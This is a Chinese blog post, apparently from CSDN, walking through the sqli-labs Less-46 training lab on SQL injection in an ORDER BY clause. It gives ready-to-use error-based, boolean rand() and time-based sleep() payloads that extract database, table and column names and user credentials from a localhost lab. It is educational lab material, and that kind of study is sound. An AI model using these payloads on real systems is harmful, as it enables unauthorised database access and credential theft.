通过盲注脚本复习sqllabs第46关 order by 注入

本文详细介绍了SQLLabsLess-46关中的orderby注入技巧,涉及参数控制、报错注入、时间注入以及利用orderby后的可控性进行数据库、表名和列名检测。学习者可以通过理解并实践这些技巧来提升SQL注入的安全防范意识。
摘要由CSDN通过智能技术生成

通过盲注脚本复习sqllabs第46关 order by 注入

less-46关

此关及之后都是order by语句与limit语句的相关注入,对于一些会显示表格的网站,他们的 URL 中通常都会有sort和limit两个参数。一进入46关页面就提示我们使用 sort ,如下图所示:

在这里插入图片描述

尝试使用 ?sort=1 发现:

在这里插入图片描述

尝试使用 ?sort=2 发现:

在这里插入图片描述

尝试使用 ?sort=3发现:

在这里插入图片描述

我们发现当我们使用 sort=1 时 表格以第一列进行排列,sort=2 时 表格以第二列进行排列, sort=3 时 表格以第三列进行排序。我们想到了order by 函数 ,猜测可能是与 order by 函数相关的注入。

源码

在这里插入图片描述

由此可断定本关通过sort参数接收需要排序的列的序号(从1开始),MySQL 查询语句为:SELECT * FROM users ORDER BY $id

尝试sort=1 asc和sort=1 desc,分别显示升序和降序的表格,说明此处是注入点,即注入点在order by后的参数中,而order by不同于在where后的注入,不能使用union等进行注入。

何为order by注入以及如何进行order by注入,这就需要了解一下 MySQL 官方的select文档:MySQL :: MySQL 8.0 Reference Manual :: 13.2.10 SELECT Statement

在这里插入图片描述

什么是order by?

在MySQL支持使用ORDER BY语句对查询结果集进行排序处理,使用ORDER BY语句不仅支持对单列数据的排序,还支持对数据表中多列数据的排序。语法格式如下:

select * from 表名 order by 列名(或者数字) asc;升序(默认升序) 
select * from 表名 order by 列名(或者数字) desc;降序

mysql中order by也多个字段自定义排序,通过逗号隔开,但只能在数字之间进行自定义排序,若选择字符类型则会根据第一个列名的排序规则进行排序。语法格式如下:

select * from 表名 order by 列名(或者数字) asc;升序(默认升序) ,列名(或者数字) desc;降序(默认升序)

而order by注入就是通过可控制的位置在order by子句后,如下order参数可控:
select * from goods order by $_GET['order']

order by注入

利用 order by 后的一些参数进行注入

order by 注入是指其后面的参数是可控的,

order by 不同于我们在 where 后的注入点,不能使用 union 等注入,其后可以跟接 报错注入 或者 时间盲注。

判断库名:

?sort=-1 and updatexml(1,concat(0x7e,database(),0x7e),1)-- q

判断表名:

?sort=-1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),0x7e),1)-- q

判断列名:

?sort=-1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),0x7e),1)-- q

查询数据:

?sort=-1 and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- q

(1)、order by 后的数字可以作为一个注入点。也就是构造 order by 后的一个语句,让该语句执行结果为一个数,我们尝试http://127.0.0.1/sqli-labs/Less-46/?sort=right(version(),1)没有报错,但是 right 换成 left 都一样,说明数字没有起作用,我们考虑布尔类型。此时我们可以用报错注入和延时注入。此处可以直接构造 ?sort= 后面的一个参数。此时,我们可以有三种形式,

1.直接添加注入语句,?sort=(select ******)
2.利用一些函数。例如 rand()函数等。?sort=rand(sql 语句)

在这里插入图片描述
在这里插入图片描述

例如:rand(ture)和 rand(false)的结果是不一样的

在这里插入图片描述
在这里插入图片描述

3.sql语句可以利用报错注入和延时注入的方式,语句可以灵活的构造。

报错注入

?sort=(select%20count(*)%20from%20information_schema.co
lumns%20group%20by%20concat(0x3a,0x3a,(select%20user()),0x3a,0x3a,floor(rand()*2)))

在这里插入图片描述

http://127.0.0.1/sqli-labs-master/less-46/?sort=rand(ascii(left(database(),1))=115)

在这里插入图片描述

http://127.0.0.1/sqli-labs-master/less-46/?sort=rand(ascii(left(database(),1))=116)

在这里插入图片描述

从上述两个图的结果,对比 rand(ture) 和 rand(false) 的结果,可以看出报错注入是成功的。

(2)procedure analyse 参数后注入 利用 procedure analyse 参数,可以执行报错注入。同时,在 procedure analyse 和 order by 之间可以存在 limit 参数,在实际应用中,往往也可能会存在 limit 后的注入,可以利用 procedure analyse 进行注入。

?sort=1%20%20procedure%20analyse(extractvalue(rand(),concat(0x3a,version())),1)

在这里插入图片描述

通过暴库

?sort=(extractvalue(1,concat(0x7e,(select database()),0x7e)))#

在这里插入图片描述

时间注入

?sort=1 and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),0)

在这里插入图片描述

?sort=1 and if(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='u',sleep(5),0)

在这里插入图片描述

?sort=1 and if(substr((select group_concat(username,password) from security.users limit 0,1),1,1)='d',sleep(5),0)

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值